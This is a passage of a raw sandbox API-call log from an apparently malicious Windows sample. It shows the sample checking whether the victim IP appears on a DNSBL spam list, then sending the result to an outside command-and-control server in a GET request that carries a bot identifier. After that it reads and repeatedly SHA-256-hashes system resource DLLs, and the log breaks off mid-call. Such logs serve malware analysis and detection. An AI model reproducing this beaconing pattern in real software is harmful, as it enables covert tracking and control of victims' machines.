pHints=0xce930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xce920 | out: ppResult=0xce920*=0x0) returned 11001 [0150.456] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41990 | out: hHeap=0x2150000) returned 1 [0150.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="169.199.153.88.spam.dnsbl.sorbs.net", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0150.456] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41990 [0150.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="169.199.153.88.spam.dnsbl.sorbs.net", cchWideChar=-1, lpMultiByteStr=0x32e41990, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="169.199.153.88.spam.dnsbl.sorbs.net", lpUsedDefaultChar=0x0) returned 36 [0150.456] getaddrinfo (in: pNodeName="169.199.153.88.spam.dnsbl.sorbs.net", pServiceName=0x0, pHints=0xce930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xce920 | out: ppResult=0xce920*=0x0) returned 11001 [0150.463] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e413d0 | out: hHeap=0x2150000) returned 1 [0150.463] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41900 | out: hHeap=0x2150000) returned 1 [0150.463] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41990 | out: hHeap=0x2150000) returned 1 [0150.463] WSACleanup () returned 0 [0150.466] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e407b0 | out: hHeap=0x2150000) returned 1 [0150.466] GetTickCount () returned 0xe8f4d7 [0150.466] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32e407b0 [0150.466] GetTickCount () returned 0xe8f4d7 [0150.466] GetTickCount () returned 0xe8f4d7 [0150.466] GetTickCount () returned 0xe8f4d7 [0150.466] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] GetTickCount () returned 0xe8f4d7 [0150.467] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e5c2b0 [0150.467] UrlEscapeW (in: pszUrl="DNSBL", pszEscaped=0x32e5c2b0, pcchEscaped=0xce25c, dwFlags=0x0 | out: pszEscaped="DNSBL", pcchEscaped=0xce25c) returned 0x0 [0150.467] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e5fa80 [0150.467] UrlEscapeW (in: pszUrl="not listed", pszEscaped=0x32e5fa80, pcchEscaped=0xce25c, dwFlags=0x0 | out: pszEscaped="not%20listed", pcchEscaped=0xce25c) returned 0x0 [0150.467] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x2000) returned 0x32e5fe90 [0150.468] WinHttpCloseHandle (hInternet=0x7581f0) returned 1 [0150.468] WinHttpOpenRequest (hConnect=0x728fa0, pwszVerb="GET", pwszObjectName="/tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/14/DNSBL/not%20listed/0/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x7581f0 [0150.468] WinHttpSetOption (hInternet=0x7581f0, dwOption=0x1f, lpBuffer=0xce288, dwBufferLength=0x4) returned 1 [0150.468] WinHttpSendRequest (hRequest=0x7581f0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0151.031] WinHttpReceiveResponse (hRequest=0x7581f0, lpReserved=0x0) returned 1 [0151.031] WinHttpQueryHeaders (in: hRequest=0x7581f0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0xce284, lpdwBufferLength=0xce28c, lpdwIndex=0x0 | out: lpBuffer=0xce284*, lpdwBufferLength=0xce28c*=0x4, lpdwIndex=0x0) returned 1 [0151.031] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5fe90 | out: hHeap=0x2150000) returned 1 [0151.031] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5c2b0 | out: hHeap=0x2150000) returned 1 [0151.031] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5fa80 | out: hHeap=0x2150000) returned 1 [0151.031] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5b5b0 | out: hHeap=0x2150000) returned 1 [0151.031] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcecc8 | out: lpSystemTimeAsFileTime=0xcecc8*(dwLowDateTime=0xe68928ef, dwHighDateTime=0x1d7b3c9)) [0151.031] GetFullPathNameW (in: lpFileName="EN\\", nBufferLength=0x105, lpBuffer=0xce710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\", lpFilePart=0x0) returned 0x17 [0151.032] PathAddBackslashW (in: pszPath="C:\\Windows\\system32\\EN\\" | out: pszPath="C:\\Windows\\system32\\EN\\") returned="" [0151.032] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\EN\\*.*", lpFindFileData=0xce928 | out: lpFindFileData=0xce928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbda8689b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbdaacae9, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbdaacae9, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x333033a0 [0151.032] FindNextFileW (in: hFindFile=0x333033a0, lpFindFileData=0xce928 | out: lpFindFileData=0xce928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbda8689b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbdaacae9, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbdaacae9, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.032] FindNextFileW (in: hFindFile=0x333033a0, lpFindFileData=0xce928 | out: lpFindFileData=0xce928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f3b0c4a, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9f3b0c4a, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9f3b0c4a, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2fb600, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWSnapIn.Resources.dll", cAlternateFileName="")) returned 1 [0151.032] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49e80 [0151.032] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x32e410c0 [0151.032] FindNextFileW (in: hFindFile=0x333033a0, lpFindFileData=0xce928 | out: lpFindFileData=0xce928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f38a9f5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9f38a9f5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9f38a9f5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0xdc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWWizFwk.Resources.dll", cAlternateFileName="")) returned 1 [0151.032] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49e80, Size=0x10) returned 0x32e4a0e0 [0151.033] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x32e42330 [0151.033] FindNextFileW (in: hFindFile=0x333033a0, lpFindFileData=0xce928 | out: lpFindFileData=0xce928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a1229a8, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9a1229a8, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9a1229a8, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AutoWorkplace.Resources.dll", cAlternateFileName="")) returned 1 [0151.033] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e4a0e0, Size=0x20) returned 0x32e5b5b0 [0151.033] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x32e4fe60 [0151.033] FindNextFileW (in: hFindFile=0x333033a0, lpFindFileData=0xce928 | out: lpFindFileData=0xce928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c3db3ca, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9c3db3ca, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9c3db3ca, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x3ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="fhuxpresentation.Resources.dll", cAlternateFileName="")) returned 1 [0151.033] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e5b5b0, Size=0x20) returned 0x32e592a0 [0151.033] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x32e5c2b0 [0151.033] FindNextFileW (in: hFindFile=0x333033a0, lpFindFileData=0xce928 | out: lpFindFileData=0xce928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c3db3ca, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9c3db3ca, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9c3db3ca, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x3ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="fhuxpresentation.Resources.dll", cAlternateFileName="")) returned 0 [0151.033] GetLastError () returned 0x12 [0151.033] FindClose (in: hFindFile=0x333033a0 | out: hFindFile=0x333033a0) returned 1 [0151.038] PathFindFileNameW (pszPath="C:\\Windows\\system32\\EN\\AuthFWSnapIn.Resources.dll") returned="AuthFWSnapIn.Resources.dll" [0151.038] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x32e5c4d0 [0151.038] GetFullPathNameW (in: lpFileName="EN\\AuthFWSnapIn.Resources.dll", nBufferLength=0x105, lpBuffer=0x32e5c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\AuthFWSnapIn.Resources.dll", lpFilePart=0x0) returned 0x31 [0151.038] CreateFileW (lpFileName="C:\\Windows\\system32\\EN\\AuthFWSnapIn.Resources.dll" (normalized: "c:\\windows\\system32\\en\\authfwsnapin.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0151.038] GetFileTime (in: hFile=0x590, lpCreationTime=0xceb38, lpLastAccessTime=0xceb30, lpLastWriteTime=0xceb28 | out: lpCreationTime=0xceb38*(dwLowDateTime=0x9f3b0c4a, dwHighDateTime=0x1d112f1), lpLastAccessTime=0xceb30*(dwLowDateTime=0x9f3b0c4a, dwHighDateTime=0x1d112f1), lpLastWriteTime=0xceb28*(dwLowDateTime=0x9f3b0c4a, dwHighDateTime=0x1d112f1)) returned 1 [0151.039] CloseHandle (hObject=0x590) returned 1 [0151.039] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xceb58 | out: lpSystemTimeAsFileTime=0xceb58*(dwLowDateTime=0xe68a3a01, dwHighDateTime=0x1d7b3c9)) [0151.039] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x32e5c6f0 [0151.039] GetFullPathNameW (in: lpFileName="EN\\AuthFWSnapIn.Resources.dll", nBufferLength=0x105, lpBuffer=0x32e5c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\AuthFWSnapIn.Resources.dll", lpFilePart=0x0) returned 0x31 [0151.039] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x140) returned 0x32e5c910 [0151.039] CreateFileW (lpFileName="C:\\Windows\\system32\\EN\\AuthFWSnapIn.Resources.dll" (normalized: "c:\\windows\\system32\\en\\authfwsnapin.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x590 [0151.039] SetFilePointer (in: hFile=0x590, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2fb600 [0151.039] SetFilePointer (in: hFile=0x590, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.039] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x2fb600) returned 0x33ab4040 [0151.048] ReadFile (in: hFile=0x590, lpBuffer=0x33ab4040, nNumberOfBytesToRead=0x2fb600, lpNumberOfBytesRead=0xce6a4, lpOverlapped=0x0 | out: lpBuffer=0x33ab4040*, lpNumberOfBytesRead=0xce6a4*=0x2fb600, lpOverlapped=0x0) returned 1 [0151.116] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32e5fa80 [0151.116] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0151.117] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.117] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x20, dwFlags=0x0) returned 1 [0151.117] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.117] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b5b0 [0151.117] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e5b5b0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e5b5b0, pdwDataLen=0xce51c) returned 1 [0151.117] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.117] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0151.117] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338239d0) returned 1 [0151.119] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.119] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x40, dwFlags=0x0) returned 1 [0151.119] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.119] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59180 [0151.119] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e59180, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e59180, pdwDataLen=0xce51c) returned 1 [0151.119] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.119] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0151.119] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338232d0) returned 1 [0151.120] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.120] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x60, dwFlags=0x0) returned 1 [0151.120] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.120] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59690 [0151.120] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e59690, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e59690, pdwDataLen=0xce51c) returned 1 [0151.120] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.120] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0151.120] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338239d0) returned 1 [0151.120] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.120] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x80, dwFlags=0x0) returned 1 [0151.120] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.120] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59930 [0151.120] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e59930, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e59930, pdwDataLen=0xce51c) returned 1 [0151.120] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.121] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0151.121] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0151.121] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.121] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0151.121] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.121] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59300 [0151.121] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e59300, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e59300, pdwDataLen=0xce51c) returned 1 [0151.121] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.121] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0151.121] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338236d0) returned 1 [0151.122] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.122] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0151.122] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.122] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59720 [0151.122] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e59720, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e59720, pdwDataLen=0xce51c) returned 1 [0151.122] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.122] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0151.122] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823ad0) returned 1 [0151.122] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.122] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0151.123] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.123] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59780 [0151.123] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e59780, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e59780, pdwDataLen=0xce51c) returned 1 [0151.123] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.123] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0151.123] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338228d0) returned 1 [0151.123] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.123] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x100, dwFlags=0x0) returned 1 [0151.123] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.123] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58f10 [0151.123] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e58f10, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e58f10, pdwDataLen=0xce51c) returned 1 [0151.123] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.123] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0151.123] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0151.124] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.124] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x120, dwFlags=0x0) returned 1 [0151.124] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.124] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e591b0 [0151.124] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e591b0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e591b0, pdwDataLen=0xce51c) returned 1 [0151.124] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.124] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0151.124] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823ad0) returned 1 [0151.125] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.125] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x140, dwFlags=0x0) returned 1 [0151.125] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.125] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e591e0 [0151.125] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e591e0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e591e0, pdwDataLen=0xce51c) returned 1 [0151.125] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.125] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0151.125] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338232d0) returned 1 [0151.125] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.125] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x160, dwFlags=0x0) returned 1 [0151.125] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.125] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e594b0 [0151.125] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e594b0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e594b0, pdwDataLen=0xce51c) returned 1 [0151.125] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.125] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0151.125] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338220d0) returned 1 [0151.126] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.126] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x180, dwFlags=0x0) returned 1 [0151.126] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.126] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59810 [0151.126] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e59810, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e59810, pdwDataLen=0xce51c) returned 1 [0151.126] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.126] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0151.126] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, 